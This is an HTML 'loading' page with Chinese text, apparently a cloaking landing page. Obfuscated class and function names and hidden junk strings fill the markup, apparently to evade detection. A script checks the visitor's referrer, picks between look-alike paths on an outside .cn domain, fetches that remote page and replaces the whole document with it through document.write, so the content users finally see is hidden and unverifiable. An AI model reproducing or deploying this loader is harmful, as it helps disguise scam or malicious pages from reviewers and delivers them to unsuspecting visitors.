<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mJl5HSzW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mJl5HSzW .xpmUYUm0UtW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mJl5HSzW .content {
            line-height: 50px;
            text-align: center
        }

        .mJl5HSzW .img {
            width: 100%
        }

        .mJl5HSzW .P8ooapnIs4o {
            text-align: center
        }

        .mJl5HSzW .P8ooapnIs4o span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mJl5HSzW .P8ooapnIs4o span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mJl5HSzW .P8ooapnIs4o span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mJl5HSzW .P8ooapnIs4o span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mJl5HSzW .P8ooapnIs4o span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mJl5HSzW .P8ooapnIs4o span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mJl5HSzW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BJWpHUKAs7Vi0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iDtMJ = BJWpHUKAs7Vi0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iDtMJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iDtMJ +".html?a=share";
		}
		
        omr6b49UMs=url+"#"+new Date().getTime();
        omr6b49UMs && function() {
            $.get(omr6b49UMs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >hjzWuj9f2vXUkoFR8ArIV4PaLap6wNVD</li>
<ul style='display:none' >LO6sAmbbKNxzHY63QJf0p9I7TGNuGa0h7EZoDWdpzBfxrWGz87wsnMLDlepjpcyG1TXdvjzBLF</ul>
<h1 style='display:none' >LSTspMAvWstMJdSpkkET1mVkEKgzgYgCxqiUhRiKPNxiIsRMVqEpVZ2fScMPz8AeQxjf7edYfT29M1NZLUzbL46S</h1>
<img  src='' style='display:none'>
<b style='display:none' >Vva4mrhiIDZ8bXFOFQ5J6Gu3GuEOKYRGfR7P05ZChbHTRDgSM2fdTx8wKohmutz6QPzShTD99B5A5RTQPracwWu7</b>
<b style='display:none' >Vva4mrhiIDZ8bXFOFQ5J6Gu3GuEOKYRGfR7P05ZChbHTRDgSM2fdTx8wKohmutz6QPzShTD99B5A5RTQPracwWu7</b><div class="mJl5HSzW">
    <div class="xpmUYUm0UtW">
        <div class="P8ooapnIs4o">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>O7ivPbBlO9YTK9Oda</div>
<a  href='#' style='display:none'>QJr281RxvuY795rx9z6hd4YiuIjdLNxKCWM2KdEX3TLoSUZxhQ3h</a>
<p  style='display:none'>xzHtEgIGy97GdpHrePwXAwgM4cuZbjkrYIE9UrGmlGsR9L9CmkvA</p>
<a  href='#' style='display:none'>QJr281RxvuY795rx9z6hd4YiuIjdLNxKCWM2KdEX3TLoSUZxhQ3h</a>
<a  href='#' style='display:none'>QJr281RxvuY795rx9z6hd4YiuIjdLNxKCWM2KdEX3TLoSUZxhQ3h</a>
<div style='display:none'>O7ivPbBlO9YTK9Oda</div>
<span style='display:none'>DaTVUiABRvcIUGEmwje</span>
<div style='display:none'>O7ivPbBlO9YTK9Oda</div></body>
</html>